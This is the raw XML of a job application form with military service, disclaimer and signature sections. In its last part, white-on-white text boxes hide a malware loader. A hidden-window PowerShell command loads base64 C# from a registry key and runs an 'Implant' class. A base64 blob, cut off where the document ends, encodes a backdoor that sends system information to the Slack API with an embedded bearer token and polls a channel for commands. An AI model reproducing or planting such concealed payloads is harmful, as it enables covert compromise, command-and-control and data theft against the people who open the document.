        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="103D1D97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14:paraId="5760ACE5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</w:tcPr>
          <w:p w14:paraId="13A4D923" w14:textId="77777777"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</w:tcPr>
          <w:p w14:paraId="362ADECB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</w:tcPr>
          <w:p w14:paraId="25B1EBBD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35AD6AE8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</w:tcPr>
          <w:p w14:paraId="58EB176D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</w:tcPr>
          <w:p w14:paraId="4DEEA5EF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14:paraId="32D5BCB0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BC07E3" w:rsidRPr="00613129" w14:paraId="0396495C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4CB46A34" w14:textId="77777777"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405B248F" w14:textId="77777777" w:rsidR="00BC07E3" w:rsidRPr="009C220D" w:rsidRDefault="00BC07E3" w:rsidP="00BC07E3">
            <w:pPr>
              <w:pStyle w:val="FieldText"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="378905DF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14:paraId="03021C34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1EB2FF60" w14:textId="77777777"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3FBC4AA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</w:tcPr>
          <w:p w14:paraId="7CB48FD6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35FEFC07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</w:tcPr>
          <w:p w14:paraId="121778FB" w14:textId="77777777" w:rsidR="00BC07E3" w:rsidRPr="005114CE" w:rsidRDefault="00BC07E3" w:rsidP="00BC07E3">
            <w:pPr>
              <w:pStyle w:val="Heading4"/>
              <w:outlineLvl w:val="3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2988DFE5" w14:textId="77777777" w:rsidR="00BC07E3" w:rsidRPr="009C220D" w:rsidRDefault="00BC07E3" w:rsidP="00BC07E3">
            <w:pPr>
              <w:pStyle w:val="FieldText"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0300995D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BC07E3" w:rsidRPr="00613129" w14:paraId="68888349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4908272E" w14:textId="77777777"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58D3E87F" w14:textId="77777777" w:rsidR="00BC07E3" w:rsidRPr="009C220D" w:rsidRDefault="00BC07E3" w:rsidP="00BC07E3">
            <w:pPr>
              <w:pStyle w:val="Checkbox"/>
            </w:pPr>
            <w:r>
              <w:t>YES</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="548B2BB3" w14:textId="72137DCB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7A184A84" w14:textId="77777777" w:rsidR="00BC07E3" w:rsidRPr="009C220D" w:rsidRDefault="00BC07E3" w:rsidP="00BC07E3">
            <w:pPr>
              <w:pStyle w:val="Checkbox"/>
            </w:pPr>
            <w:r>
              <w:t>NO</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10EF97A7" w14:textId="23BCDC76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52999225" w14:textId="77777777" w:rsidR="00BC07E3" w:rsidRPr="005114CE" w:rsidRDefault="00BC07E3" w:rsidP="00BC07E3">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00176E67" w:rsidRPr="00613129" w14:paraId="42FBA2AF" w14:textId="77777777" w:rsidTr="00BD103E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5040" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="58216C4C" w14:textId="77777777" w:rsidR="00176E67" w:rsidRPr="005114CE" w:rsidRDefault="00176E67" w:rsidP="00BC07E3"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="15448537" w14:textId="77777777"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00B74E26" w14:textId="77777777"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133DC001" w14:textId="77777777" w:rsidR="00176E67" w:rsidRPr="005114CE" w:rsidRDefault="00176E67" w:rsidP="00BC07E3">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00176E67" w:rsidRPr="00613129" w14:paraId="6355F6EA" w14:textId="77777777" w:rsidTr="00BD103E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A9CDB05" w14:textId="77777777" w:rsidR="00176E67" w:rsidRPr="005114CE" w:rsidRDefault="00176E67" w:rsidP="00BC07E3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E8B1CE3" w14:textId="77777777"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39E03B02" w14:textId="77777777"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6A449005" w14:textId="77777777" w:rsidR="00176E67" w:rsidRPr="005114CE" w:rsidRDefault="00176E67" w:rsidP="00BC07E3">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="73EE6CCF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BC07E3" w:rsidRPr="00613129" w14:paraId="1148D566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1CD1406E" w14:textId="77777777"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22A17FEC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28B550E9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4EEDBBC2" w14:textId="77777777" w:rsidR="00BC07E3" w:rsidRPr="009C220D" w:rsidRDefault="00BC07E3" w:rsidP="00BC07E3">
            <w:pPr>
              <w:pStyle w:val="FieldText"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC07E3" w:rsidRPr="00613129" w14:paraId="295DD563" w14:textId="77777777" w:rsidTr="00BD103E">
        <w:trPr>
          <w:trHeight w:val="360"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1072" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="322F6E51" w14:textId="77777777"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60A7DF1C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23270C2A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2C0A7CAD" w14:textId="77777777" w:rsidR="00BC07E3" w:rsidRPr="009C220D" w:rsidRDefault="00BC07E3" w:rsidP="00BC07E3">
            <w:pPr>
              <w:pStyle w:val="FieldText"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0FCFF6F5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14:paraId="181115D6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</w:tcPr>
          <w:p w14:paraId="3841CD20" w14:textId="77777777"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</w:tcPr>
          <w:p w14:paraId="4F672056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</w:tcPr>
          <w:p w14:paraId="425069AB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21F2AA93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</w:tcPr>
          <w:p w14:paraId="7586A0FE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</w:tcPr>
          <w:p w14:paraId="48DB1713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14:paraId="627F75BA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BC07E3" w:rsidRPr="00613129" w14:paraId="5562D4AA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4ED4493F" w14:textId="77777777"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410AC636" w14:textId="77777777" w:rsidR="00BC07E3" w:rsidRPr="009C220D" w:rsidRDefault="00BC07E3" w:rsidP="00BC07E3">
            <w:pPr>
              <w:pStyle w:val="FieldText"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4B856FCC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14:paraId="342FC21F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591ED07B" w14:textId="77777777"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0E30E3B1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</w:tcPr>
          <w:p w14:paraId="049BAB16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62FF1DCB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</w:tcPr>
          <w:p w14:paraId="7026D46D" w14:textId="77777777" w:rsidR="00BC07E3" w:rsidRPr="005114CE" w:rsidRDefault="00BC07E3" w:rsidP="00BC07E3">
            <w:pPr>
              <w:pStyle w:val="Heading4"/>
              <w:outlineLvl w:val="3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1CB05814" w14:textId="77777777" w:rsidR="00BC07E3" w:rsidRPr="009C220D" w:rsidRDefault="00BC07E3" w:rsidP="00BC07E3">
            <w:pPr>
              <w:pStyle w:val="FieldText"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2736E459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BC07E3" w:rsidRPr="00613129" w14:paraId="075B86D8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7FE2EFF0" w14:textId="77777777"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401BC093" w14:textId="77777777" w:rsidR="00BC07E3" w:rsidRPr="009C220D" w:rsidRDefault="00BC07E3" w:rsidP="00BC07E3">
            <w:pPr>
              <w:pStyle w:val="Checkbox"/>
            </w:pPr>
            <w:r>
              <w:t>YES</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03B7A0F2" w14:textId="19E891B2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36A619B7" w14:textId="77777777" w:rsidR="00BC07E3" w:rsidRPr="009C220D" w:rsidRDefault="00BC07E3" w:rsidP="00BC07E3">
            <w:pPr>
              <w:pStyle w:val="Checkbox"/>
            </w:pPr>
            <w:r>
              <w:t>NO</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D3544FE" w14:textId="0A8BECA6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480163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1FA49101" w14:textId="77777777" w:rsidR="00BC07E3" w:rsidRPr="005114CE" w:rsidRDefault="00BC07E3" w:rsidP="00BC07E3">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D50B7C7" w14:textId="77777777" w:rsidR="00871876" w:rsidRDefault="00871876" w:rsidP="00871876">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Military Service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23"/>
        <w:gridCol w:w="5207"/>
        <w:gridCol w:w="846"/>
        <w:gridCol w:w="1314"/>
        <w:gridCol w:w="540"/>
        <w:gridCol w:w="1350"/>
      </w:tblGrid>
      <w:tr w:rsidR="000D2539" w:rsidRPr="005114CE" w14:paraId="321EF9A4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823" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CA726AE" w14:textId="77777777" w:rsidR="000D2539" w:rsidRPr="005114CE" w:rsidRDefault="000D2539" w:rsidP="00490804">
            <w:r w:rsidRPr="005114CE">
              <w:t>Branch:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5207" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3383D5CD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846" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63ADE539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From:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1314" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="213FAE0D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540" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2304E33E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0D8E960C" w14:textId="77777777" w:rsidR="000D2539" w:rsidRPr="009C220D" w:rsidRDefault="000D2539" w:rsidP="00902964">
            <w:pPr>
              <w:pStyle w:val="FieldText"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="695BD3A7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829"/>
        <w:gridCol w:w="3120"/>
        <w:gridCol w:w="1927"/>
        <w:gridCol w:w="3204"/>
      </w:tblGrid>
      <w:tr w:rsidR="000D2539" w:rsidRPr="005114CE" w14:paraId="3E2E21CB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829" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02D3AE06" w14:textId="77777777" w:rsidR="000D2539" w:rsidRPr="005114CE" w:rsidRDefault="000D2539" w:rsidP="00490804">
            <w:r w:rsidRPr="005114CE">
              <w:t>Rank at Discharge:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0DC7D56E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1927" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="465387BF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Type of Discharge:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3204" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0D8B905E" w14:textId="77777777" w:rsidR="000D2539" w:rsidRPr="009C220D" w:rsidRDefault="000D2539" w:rsidP="00902964">
            <w:pPr>
              <w:pStyle w:val="FieldText"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0AD332B4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2842"/>
        <w:gridCol w:w="7238"/>
      </w:tblGrid>
      <w:tr w:rsidR="000D2539" w:rsidRPr="005114CE" w14:paraId="46C24D8B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2842" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="634CE194" w14:textId="77777777" w:rsidR="000D2539" w:rsidRPr="005114CE" w:rsidRDefault="000D2539" w:rsidP="00490804">
            <w:r w:rsidRPr="005114CE">
              <w:t>If other than honorable, explain:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7238" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1776E1D4" w14:textId="77777777" w:rsidR="000D2539" w:rsidRPr="009C220D" w:rsidRDefault="000D2539" w:rsidP="00902964">
            <w:pPr>
              <w:pStyle w:val="FieldText"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2725AAEF" w14:textId="77777777" w:rsidR="00871876" w:rsidRDefault="00871876" w:rsidP="00871876">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="009C220D">
        <w:t>Disclaimer and Signature</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1B59B4" w14:textId="77777777" w:rsidR="00871876" w:rsidRPr="005114CE" w:rsidRDefault="00871876" w:rsidP="00490804">
      <w:pPr>
        <w:pStyle w:val="Italic"/>
      </w:pPr>
      <w:r w:rsidRPr="005114CE">
        <w:t xml:space="preserve">I certify that my answers are true and complete to the best of my knowledge. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134D4827" w14:textId="77777777" w:rsidR="00871876" w:rsidRPr="00871876" w:rsidRDefault="00871876" w:rsidP="00490804">
      <w:pPr>
        <w:pStyle w:val="Italic"/>
      </w:pPr>
      <w:r w:rsidRPr="005114CE">
        <w:t>If this application leads to employment, I understand that false or misleading information in my application or interview may result in my release.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6145"/>
        <w:gridCol w:w="674"/>
        <w:gridCol w:w="2189"/>
      </w:tblGrid>
      <w:tr w:rsidR="000D2539" w:rsidRPr="005114CE" w14:paraId="393BB524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72" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16D5BA17" w14:textId="77777777" w:rsidR="000D2539" w:rsidRPr="005114CE" w:rsidRDefault="000D2539" w:rsidP="00490804">
            <w:r w:rsidRPr="005114CE">
              <w:t>Signature:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6145" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2050C77E" w14:textId="77777777" w:rsidR="000D2539" w:rsidRPr="005114CE" w:rsidRDefault="000D2539" w:rsidP="00682C69">
            <w:pPr>
              <w:pStyle w:val="FieldText"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="674" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5601FD05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Date:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2189" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="25549743" w14:textId="77777777" w:rsidR="000D2539" w:rsidRPr="005114CE" w:rsidRDefault="000D2539" w:rsidP="00682C69">
            <w:pPr>
              <w:pStyle w:val="FieldText"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="42A0EAB6" w14:textId="7F5176C2" w:rsidR="005F6E87" w:rsidRPr="004E34C6" w:rsidRDefault="00944FEF" w:rsidP="004E34C6">
      <w:bookmarkStart w:id="19" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="19"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="zh-CN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63DE056" wp14:editId="75CB3A66">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>985058</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>6625186</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="631767" cy="242512"/>
                <wp:effectExtent l="0" t="0" r="0" b="5715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1767" cy="242512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872736" w14:textId="7F21DA2D" w:rsidR="00A556DD" w:rsidRPr="00D14896" w:rsidRDefault="00A556DD" w:rsidP="00A556DD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D14896">
                              <w:rPr>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                              </w:rPr>
                              <w:t>powershell.exe</w:t>
                            </w:r>
                            <w:r w:rsidR="00967A12" w:rsidRPr="00D14896">
                              <w:rPr>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> –</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidR="00967A12" w:rsidRPr="00D14896">
                              <w:rPr>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                              </w:rPr>
                              <w:t>windowstyle</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidR="00967A12" w:rsidRPr="00D14896">
                              <w:rPr>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> hidden</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00D14896">
                              <w:rPr>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> -Command $bytes = [System.Text.Encoding]:</w:t>
                            </w:r>
                            <w:proofErr w:type="gramStart"/>
                            <w:r w:rsidRPr="00D14896">
                              <w:rPr>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                              </w:rPr>
                              <w:t>:UTF8.GetString</w:t>
                            </w:r>
                            <w:proofErr w:type="gramEnd"/>
                            <w:r w:rsidRPr="00D14896">
                              <w:rPr>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                              </w:rPr>
                              <w:t>([System.Convert]::FromBase64String((Get-ItemProperty -Path 'Registry::HKEY_CURRENT_USER\Control Panel\Appearance\Schemes' -Name '@themeui.dll,-900').'@themeui.dll,-900')); Add-Type -</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="00D14896">
                              <w:rPr>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                              </w:rPr>
                              <w:t>TypeDefinition</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="00D14896">
                              <w:rPr>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> $bytes; [</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="00D14896">
                              <w:rPr>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                              </w:rPr>
                              <w:t>Implant.Program</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="00D14896">
                              <w:rPr>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                              </w:rPr>
                              <w:t>]:</w:t>
                            </w:r>
                            <w:proofErr w:type="gramStart"/>
                            <w:r w:rsidRPr="00D14896">
                              <w:rPr>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                              </w:rPr>
                              <w:t>:Main</w:t>
                            </w:r>
                            <w:proofErr w:type="gramEnd"/>
                            <w:r w:rsidRPr="00D14896">
                              <w:rPr>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                              </w:rPr>
                              <w:t>();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7.55pt;margin-top:521.65pt;width:49.75pt;height:19.1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N36HgIAABkEAAAOAAAAZHJzL2Uyb0RvYy54bWysU8tu2zAQvBfoPxC813rUj0SwHKROUxRI&#10;H0DSD6AoyiJKclmStuR+fZaU4xjtragOBJe7HM3ODtc3o1bkIJyXYGpazHJKhOHQSrOr6Y+n+3dX&#10;lPjATMsUGFHTo/D0ZvP2zXqwlSihB9UKRxDE+GqwNe1DsFWWed4LzfwMrDCY7MBpFjB0u6x1bEB0&#10;rbIyz5fZAK61DrjwHk/vpiTdJPyuEzx86zovAlE1RW4hrS6tTVyzzZpVO8dsL/mJBvsHFppJgz89&#10;Q92xwMjeyb+gtOQOPHRhxkFn0HWSi9QDdlPkf3Tz2DMrUi8ojrdnmfz/g+VfD98dkS3OjhLDNI7o&#10;SYyBfICRlFGdwfoKix4tloURj2Nl7NTbB+A/PTGw7ZnZiVvnYOgFa5FdEW9mF1cnHB9BmuELtPgb&#10;tg+QgMbO6QiIYhBExykdz5OJVDgeLt8Xq+WKEo6pcl4uisQtY9XLZet8+CRAk7ipqcPBJ3B2ePAh&#10;kmHVS0kiD0q291KpFESzia1y5MDQJs1uoo8tXlYpQ4aaXi/KRQI2EK8n+2gZ0MNK6ppe5fGbXBW1&#10;+GjaVBKYVNMeiShzEifqMSkTxmbEwqhYA+0RZXIweRXfFm56cL8pGdCnNfW/9swJStRng1JfF/N5&#10;NHYK5otViYG7zDSXGWY4QtU0UDJttyE9hiiDgVscSSeTXK9MTlzRf0nF01uJBr+MU9Xri948AwAA&#10;//8DAFBLAwQUAAYACAAAACEAJ/LmCOAAAAANAQAADwAAAGRycy9kb3ducmV2LnhtbEyPwU7DMBBE&#10;70j8g7VI3KidtilRiFMBEhcuqKXi7MRLHBrbke02ga9ne4Lbzu5o9k21ne3Azhhi752EbCGAoWu9&#10;7l0n4fD+clcAi0k5rQbvUMI3RtjW11eVKrWf3A7P+9QxCnGxVBJMSmPJeWwNWhUXfkRHt08frEok&#10;Q8d1UBOF24Evhdhwq3pHH4wa8dlge9yfrISP7guf+tfwI964mI6F3x2aeyPl7c38+AAs4Zz+zHDB&#10;J3SoianxJ6cjG0jneUZWGsR6tQJGlmW+3gBrLqsiy4HXFf/fov4FAAD//wMAUEsBAi0AFAAGAAgA&#10;AAAhALaDOJL+AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwEC&#10;LQAUAAYACAAAACEAOP0h/9YAAACUAQAACwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwEC&#10;LQAUAAYACAAAACEAz7Td+h4CAAAZBAAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQ&#10;SwECLQAUAAYACAAAACEAJ/LmCOAAAAANAQAADwAAAAAAAAAAAAAAAAB4BAAAZHJzL2Rvd25yZXYu&#10;eG1sUEsFBgAAAAAEAAQA8wAAAIUFAAAAAA==&#10;" fillcolor="white [3212]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="02872736" w14:textId="7F21DA2D" w:rsidR="00A556DD" w:rsidRPr="00D14896" w:rsidRDefault="00A556DD" w:rsidP="00A556DD">
                      <w:pPr>
                        <w:rPr>
                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00D14896">
                        <w:rPr>
                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                        </w:rPr>
                        <w:t>powershell.exe</w:t>
                      </w:r>
                      <w:r w:rsidR="00967A12" w:rsidRPr="00D14896">
                        <w:rPr>
                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> –</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidR="00967A12" w:rsidRPr="00D14896">
                        <w:rPr>
                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                        </w:rPr>
                        <w:t>windowstyle</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidR="00967A12" w:rsidRPr="00D14896">
                        <w:rPr>
                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> hidden</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00D14896">
                        <w:rPr>
                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> -Command $bytes = [System.Text.Encoding]:</w:t>
                      </w:r>
                      <w:proofErr w:type="gramStart"/>
                      <w:r w:rsidRPr="00D14896">
                        <w:rPr>
                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                        </w:rPr>
                        <w:t>:UTF8.GetString</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd"/>
                      <w:r w:rsidRPr="00D14896">
                        <w:rPr>
                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                        </w:rPr>
                        <w:t>([System.Convert]::FromBase64String((Get-ItemProperty -Path 'Registry::HKEY_CURRENT_USER\Control Panel\Appearance\Schemes' -Name '@themeui.dll,-900').'@themeui.dll,-900')); Add-Type -</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="00D14896">
                        <w:rPr>
                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                        </w:rPr>
                        <w:t>TypeDefinition</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="00D14896">
                        <w:rPr>
                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> $bytes; [</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="00D14896">
                        <w:rPr>
                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                        </w:rPr>
                        <w:t>Implant.Program</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="00D14896">
                        <w:rPr>
                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                        </w:rPr>
                        <w:t>]:</w:t>
                      </w:r>
                      <w:proofErr w:type="gramStart"/>
                      <w:r w:rsidRPr="00D14896">
                        <w:rPr>
                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                        </w:rPr>
                        <w:t>:Main</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd"/>
                      <w:r w:rsidRPr="00D14896">
                        <w:rPr>
                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                        </w:rPr>
                        <w:t>();</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00D10D9A">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="zh-C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A683155" wp14:editId="7345FBFD">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-286788</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>6380075</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="615142" cy="245687"/>
                <wp:effectExtent l="0" t="0" r="0" b="254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5142" cy="245687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38792A" w14:textId="5603161A" w:rsidR="00F4725A" w:rsidRPr="00967A12" w:rsidRDefault="00694955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694955">
                              <w:rPr>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                              </w:rPr>
                              <w:t>dXNpbmcgU3lzdGVtOwp1c2luZyBTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYzsKdXNpbmcgU3lzdGVtLkNvbGxlY3Rpb25zLlNwZWNpYWxpemVkOwp1c2luZyBTeXN0ZW0uRGlhZ25vc3RpY3M7CnVzaW5nIFN5c3RlbS5OZXQ7CnVzaW5nIFN5c3RlbS5UaHJlYWRpbmc7CgpuYW1lc3BhY2UgSW1wbGFudAp7CiAgICBwdWJsaWMgY2xhc3MgUHJvZ3JhbQogICAgewogICAgICAgIHB1YmxpYyBzdGF0aWMgdm9pZCBNYWluKCkKICAgICAgICB7CiAgICAgICAgICAgIFN0cmluZyBtc2cgPSBnZXRTeXN0ZW1JbmZvKCk7CiAgICAgICAgICAgIHNlbmRNc2cobXNnKTsKICAgICAgICB9CgogICAgICAgIHB1YmxpYyBzdGF0aWMgdm9pZCBzZW5kTXNnKFN0cmluZyBtc2cpCiAgICAgICAgewogICAgICAgICAgICBTdHJpbmcgdXJsID0gImh0dHBzOi8vc2xhY2suY29tL2FwaS9jaGF0LnBvc3RNZXNzYWdlIjsKICAgICAgICAgICAgV2ViQ2xpZW50IHdiID0gbmV3IFdlYkNsaWVudCgpOwogICAgICAgICAgICB3Yi5IZWFkZXJzW0h0dHBSZXF1ZXN0SGVhZGVyLkNvbnRlbnRUeXBlXSA9ICJhcHBsaWNhdGlvbi9qc29uIjsKICAgICAgICAgICAgd2IuSGVhZGVyc1tIdHRwUmVxdWVzdEhlYWRlci5BdXRob3JpemF0aW9uXSA9ICJCZWFyZXIgeG94Yi0yODQ1OTgwOTE1MjIzLTI4NjA1OTA3NzkwNDItTTBPbU9UNFNxb1NlZ1ozZkJNVmlLQjB4IjsKICAgICAgICAgICAgd2IuVXBsb2FkU3RyaW5nKHVybCwgIntcImNoYW5uZWxcIjpcIkMwMlI0NkhKUVQwXCIsIFwidGV4dFwiOlwiIiArIG1zZyArIlwifSIpOwoKICAgICAgICAgICAgd2hpbGUgKHRydWUpCiAgICAgICAgICAgIHsKICAgICAgICAgICAgICAgIFN0cmluZyByZXMgPSB3Yi5Eb3dubG9hZFN0cmluZygiaHR0cHM6Ly9zbGFjay5jb20vYXBpL2NvbnZlcnNhdGlvbnMuaGlzdG9yeT9jaGFubmVsPUMwMlJENUtTTUs2Iik7CiAgICAgICAgICAgICAgICBpbnQgYmVnaW5faWR4ID0gcmVz